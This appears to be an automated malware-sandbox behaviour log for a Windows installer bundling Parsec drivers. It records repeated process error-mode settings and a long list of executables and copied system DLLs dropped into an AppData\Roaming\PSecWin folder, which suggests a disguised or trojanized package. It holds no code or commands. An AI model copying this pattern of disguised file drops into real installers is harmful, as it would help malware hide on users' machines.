Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\grpconv.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\grpconv.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\grpconv.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\grpconv.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C2F4DD0 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiBuildDriverInfoList,SetupDiEnumDriverInfoW,SetupDiEnumDeviceInfo,GetLastError,SetupDiDestroyDeviceInfoList,SetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,48_2_00007FF72C2F4DD0
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\SystemEventsBrokerClient.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-GF1GP.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-E9NUA.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-6QS3I.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\wiashext.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\rdvgocl32.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\RdpSaUacHelper.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\wlanext.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-LQSSJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-ETRQM.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-UEG3C.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-MAETF.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\TrustedSignalCredProv.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-4URGO.tmp
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\nsExec.dll
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg84FF.tmp\System.dll
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-RT5NS.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\kbdarmty.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\Windows.UI.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-9PV08.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\IEAdvpack.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-E0QD0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\cryptdlg.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\networkhelper.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\MFWMAAEC.DLL (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\Windows.ApplicationModel.ConversationalAgent.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\WSClient.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\VscMgrPS.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-DPGTR.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\xpsservices.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-JR54E.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\kbd101b.DLL (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-9HF18.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Program Files\Parsec\uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\mfc140enu.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-CR69T.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-I559Q.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\UserDataAccessRes.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-MRTFO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-O65TT.tmp
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\SET7030.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\icuin.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\KBDA3.DLL (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\xwreg.dll (copy)
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\SET8ABC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\VAN.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-PJ6TS.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\wups.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-2DG57.tmp
Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\SET70EC.tmp
Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\parsecvusba.sys (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-B9257.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\LockAppBroker.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\MCRecvSrc.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\netevent.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\socialapis.dll (copy)
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.sys (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\gp548-win64-mingw.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\dskquoui.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\netlogon.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-CEP95.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\TpmTool.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-2OR81.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Program Files\Parsec\skel\parsecd-150-93b.dll
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-KU451.tmp
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-CFLCO.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\ApplicationID.dll
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-JBM9N.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-GTN75.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Program Files\Parsec\teams.exe
Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\SET638E.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\runonce.exe (copy)
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-BT11A.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\dmcfgutils.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-3KUTO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-IQ3DU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\ws2help.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\shrpubw.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\tapiui.dll (copy)
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\UserInfo.dll
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\mm.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\mcbuilder.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-O9NMT.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\MP43DECD.DLL (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\sscore.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\verifier.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-HI204.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-ADU4M.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-0HD4S.tmp
Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\parsecvirtualds.sys (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-NSRV7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\getuname.dll (copy)
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual Display Driver\uninstall.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\nsExec.dll
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-V0EDB.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-O1M5L.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-G3B26.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-S2KJ6.tmp
